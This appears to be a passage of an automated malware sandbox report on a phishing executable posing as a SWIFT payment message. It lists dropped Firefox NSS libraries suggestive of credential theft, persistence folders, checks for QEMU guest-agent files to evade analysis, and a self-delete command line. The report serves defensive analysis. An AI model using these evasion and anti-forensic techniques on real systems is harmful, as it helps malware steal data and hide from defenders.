Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018771752.000000001E6B4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018457895.000000001E6A8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018618086.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018284897.000000001E6A4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018902003.000000001E6B8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017632938.000000001E698000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018095625.000000001E6A0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019101053.000000001E6BC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017886333.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005301719.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.4.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018457895.000000001E6A8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018284897.000000001E6A4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017632938.000000001E698000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018095625.000000001E6A0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7976244573.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017886333.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-string-l1-1-0.dll.4.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7997374379.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7998188833.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.4.dr
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015969591.000000001E66C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l2-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019922656.000000001E6F4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020444307.000000001E700000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020103114.000000001E6F8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015969591.000000001E66C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016183556.000000001E670000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016323485.000000001E674000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016445473.000000001E678000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7969234016.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016567401.000000001E67C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7968362187.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015969591.000000001E66C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016183556.000000001E670000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016323485.000000001E674000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016445473.000000001E678000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7968362187.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7983291992.000000001DD14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019749617.000000001E6E4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7982644058.000000001DD10000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020249501.000000001DA70000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020696835.000000001DA80000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7990657320.000000001DD0C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7989641253.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.4.dr

Data Obfuscation

Source: Yara match File source: 00000001.00000002.7934819719.00000000005AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.7688018397.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_10002DE0 push eax; ret 1_2_10002E0E
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AFA23D push esp; ret 1_2_02AFA248
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF4065 push ds; retf 1_2_02AF4067
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AFA172 push edx; retf 1_2_02AFA1AE
Source: msvcp140.dll.4.dr Static PE information: section name: .didat
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 1_2_10001B18
Source: api-ms-win-crt-stdio-l1-1-0.dll.4.dr Static PE information: 0xE0D5091C [Wed Jul 13 01:51:24 2089 UTC]
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-private-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\ucrtbase.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-multibyte-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\nsjFA0C.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-errorhandling-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-datetime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-file-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\nssdbm3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-console-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-debug-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Bikes Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Bikes\Bombekrater210 Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Bikes\Bombekrater210\Cykelhandlerne.Sme Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\libxml2-2.0.typelib Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Coasting102.For Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Castrate Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Castrate\memstat.c Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Novelizes Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Novelizes\selection-end-symbolic.symbolic.png Jump to behavior

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Process created: C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "Swift Mesaj#U0131#09971.exe
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-file-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-private-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\nssdbm3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-console-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-debug-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-multibyte-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-errorhandling-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-datetime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
